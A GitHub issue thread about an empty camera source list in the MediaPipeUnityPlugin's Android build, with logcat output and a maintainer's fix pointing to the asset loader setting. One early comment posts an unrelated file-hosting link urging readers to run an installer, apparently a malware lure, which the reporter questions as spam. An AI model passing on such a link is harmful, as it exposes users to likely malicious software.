### ISSUE TITLE
ImageSourceProvider.ImageSource.sourceCandidateNames appears empty on android phone

### ISSUE THREAD

**Issue by Leon-Zhang** [homuler/MediaPipeUnityPlugin#1257]
### Plugin Version or Commit ID

v0.15.0

### Unity Version

2022.3.41f

### Your Host OS

Windows 11

### Target Platform

Android

### Build Command

n/a 

### Bug Description

I used the unitypackage to import to a newly created 3d project, the hand detection scene works fine on windows desktop, but after built to apk and running on android phone(2 cameras), the ImageSourceProvider.ImageSource.sourceCandidateNames(ImageSource is WebCamSource) appears empty, and the Source drop down list is also empty on config window.  While WebCamTexture.devices output is correct.

### Steps to Reproduce the Bug

as described.

### Log

n/a

**Comment by Deepak78987** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by Leon-Zhang** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

is this spam?

**Comment by Leon-Zhang** [comment]
![Screenshot_20240904-215257](https://github.com/user-attachments/assets/ecc22545-126b-49c5-b232-6e68d8948f0c)

**Comment by homuler** [comment]
Will you share the log?

**Comment by Leon-Zhang** [comment]
> Will you share the log?

Can you please guide from where to find the log files? I found no log file under /Android/data/<packagename>/ folder.

**Comment by homuler** [comment]
https://github.com/homuler/MediaPipeUnityPlugin/blob/c691e7c85bcffd7e669fe71a08e86dab77bf6b75/.github/ISSUE_TEMPLATE/bug_report.yml?plain=1#L137-L142

**Comment by Leon-Zhang** [comment]
Here are the logs

09-08 03:29:45.792 30960 31045 I tflite  : Initialized TensorFlow Lite runtime.
09-08 03:32:30.224  1059  1080 I Unity   : MemoryManager: Using 'Dynamic Heap' Allocator.
09-08 03:32:30.248  1059  1080 I Unity   : SystemInfo CPU = ARM64 FP ASIMD AES, Cores = 8, Memory = 7492mb
09-08 03:32:30.248  1059  1080 I Unity   : SystemInfo ARM big.LITTLE configuration: 2 big (mask: 0xc0), 6 little (mask: 0x3f)
09-08 03:32:30.248  1059  1080 I Unity   : ApplicationInfo com.cellid.handdemo version 0.1
09-08 03:32:30.248  1059  1080 I Unity   : Built from '2022.3/staging' branch, Version '2022.3.41f1 (0f988161febf)', Build type 'Release', Scripting Backend 'il2cpp', CPU 'arm64-v8a', Stripping 'Enabled'
09-08 03:32:30.434  1059  1080 I Unity   : Company Name: DefaultCompany
09-08 03:32:30.434  1059  1080 I Unity   : Product Name: handdemo
09-08 03:32:32.847  1059  1080 I Unity   : Initializing the Bootstrap GameObject
09-08 03:32:32.847  1059  1080 I Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:32.847  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:32.847  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:32.847  1059  1080 I Unity   :
09-08 03:32:32.851  1059  1080 I Unity   : The configuration for the sample app can be modified using AppSettings.asset.
09-08 03:32:32.851  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Init>d__11:MoveNext()
09-08 03:32:32.851  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:32.851  1059  1080 I Unity   : UnityEngine.Object:Instantiate(T)
09-08 03:32:32.851  1059  1080 I Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:32.851  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:32.851  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:32.851  1059  1080 I Unity   :
09-08 03:32:32.852  1059  1080 W Unity   : Logging for the MediaPipeUnityPlugin will be suppressed. To enable logging, please check the 'Development Build' option and build.
09-08 03:32:32.852  1059  1080 W Unity   : Mediapipe.Unity.Sample.<Init>d__11:MoveNext()
09-08 03:32:32.852  1059  1080 W Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:32.852  1059  1080 W Unity   : UnityEngine.Object:Instantiate(T)
09-08 03:32:32.852  1059  1080 W Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:32.852  1059  1080 W Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:32.852  1059  1080 W Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:32.852  1059  1080 W Unity   :
09-08 03:32:33.055  1059  1080 I Unity   : Setting global flags...
09-08 03:32:33.055  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Init>d__11:MoveNext()
09-08 03:32:33.055  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.055  1059  1080 I Unity   : UnityEngine.Object:Instantiate(T)
09-08 03:32:33.055  1059  1080 I Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:33.055  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:33.055  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.055  1059  1080 I Unity   :
09-08 03:32:33.058  1059  1080 I Unity   : Initializing AssetLoader...
09-08 03:32:33.058  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Init>d__11:MoveNext()
09-08 03:32:33.058  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.058  1059  1080 I Unity   : UnityEngine.Object:Instantiate(T)
09-08 03:32:33.058  1059  1080 I Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:33.058  1059  1080 I Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:33.058  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.058  1059  1080 I Unity   :
09-08 03:32:33.059  1059  1080 E Unity   : LocalResourceManager is only supported on UnityEditor.To avoid this error, consider switching to the StreamingAssetsResourceManager and copying the required resources under StreamingAssets, for example.
09-08 03:32:33.059  1059  1080 E Unity   : Mediapipe.Unity.Sample.<Init>d__11:MoveNext()
09-08 03:32:33.059  1059  1080 E Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.059  1059  1080 E Unity   : UnityEngine.Object:Instantiate(T)
09-08 03:32:33.059  1059  1080 E Unity   : Mediapipe.Unity.Sample.BaseRunner:FindBootstrap()
09-08 03:32:33.059  1059  1080 E Unity   : Mediapipe.Unity.Sample.<Start>d__7:MoveNext()
09-08 03:32:33.059  1059  1080 E Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.059  1059  1080 E Unity   :
09-08 03:32:33.112  1059  1080 I Unity   : Camera 0
09-08 03:32:33.112  1059  1080 I Unity   : <Start>d__0:MoveNext()
09-08 03:32:33.112  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.112  1059  1080 I Unity   :
09-08 03:32:33.112  1059  1080 I Unity   : Null
09-08 03:32:33.112  1059  1080 I Unity   : <Start>d__0:MoveNext()
09-08 03:32:33.112  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.112  1059  1080 I Unity   :
09-08 03:32:33.112  1059  1080 I Unity   : Camera 1
09-08 03:32:33.112  1059  1080 I Unity   : <Start>d__0:MoveNext()
09-08 03:32:33.112  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.112  1059  1080 I Unity   :
09-08 03:32:33.113  1059  1080 I Unity   : Null
09-08 03:32:33.113  1059  1080 I Unity   : <Start>d__0:MoveNext()
09-08 03:32:33.113  1059  1080 I Unity   : UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)
09-08 03:32:33.113  1059  1080 I Unity   :
09-08 03:32:43.657  1059  1080 E Unity   : NullReferenceException: Object reference not set to an instance of an object.
09-08 03:32:43.657  1059  1080 E Unity   :   at Mediapipe.Unity.Sample.VisionTaskApiRunner`1[TTask].Pause () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   :   at UnityEngine.Events.UnityEvent.Invoke () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   :   at UnityEngine.EventSystems.ExecuteEvents.Execute[T] (UnityEngine.GameObject target, UnityEngine.EventSystems.BaseEventData eventData, UnityEngine.EventSystems.ExecuteEvents+EventFunction`1[T1] functor) [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   :   at UnityEngine.EventSystems.StandaloneInputModule.ProcessTouchPress (UnityEngine.EventSystems.PointerEventData pointerEvent, System.Boolean pressed, System.Boolean released) [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   :   at UnityEngine.EventSystems.StandaloneInputModule.ProcessTouchEvents () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   :   at UnityEngine.EventSystems.StandaloneInputModule.Process () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.657  1059  1080 E Unity   : UnityEngin
09-08 03:32:43.663  1059  1080 E Unity   : NullReferenceException: Object reference not set to an instance of an object.
09-08 03:32:43.663  1059  1080 E Unity   :   at Mediapipe.Unity.Sample.UI.ImageSourceConfig.InitializeSource () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.663  1059  1080 E Unity   :   at Mediapipe.Unity.Sample.UI.ImageSourceConfig.InitializeContents () [0x00000] in <00000000000000000000000000000000>:0
09-08 03:32:43.663  1059  1080 E Unity   :
09-08 03:32:43.720  1059  1080 E Unity   : NullReferenceException: Object reference not set to an instance of an object.
09-08 03:32:43.720  1059  1080 E Unity   :   at Mediapipe.Unity.Sample.UI.ImageSourceConfig.OnGUI () [0x00000] in <00000000000000000000000000000000>:0

**Comment by homuler** [comment]
> 09-08 03:32:33.059 1059 1080 E Unity : LocalResourceManager is only supported on UnityEditor.To avoid this error, consider switching to the StreamingAssetsResourceManager and copying the required resources under StreamingAssets, for example.

See https://github.com/homuler/MediaPipeUnityPlugin?tab=readme-ov-file#asset-loader-type

**Comment by Leon-Zhang** [comment]
solved, thank you.
